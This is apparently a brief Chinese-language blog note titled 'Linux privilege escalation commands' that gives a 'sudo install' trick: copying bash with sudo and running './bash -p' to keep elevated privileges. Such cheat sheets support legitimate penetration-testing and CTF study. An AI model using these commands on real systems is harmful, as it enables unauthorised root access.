跳到主內容

【Linux】【提權】相關指令

Sudo install

 

# 
# ./bash -p => -p:  載入下環境變數
sudo install -m 755 $(which bash) . 
./bash -p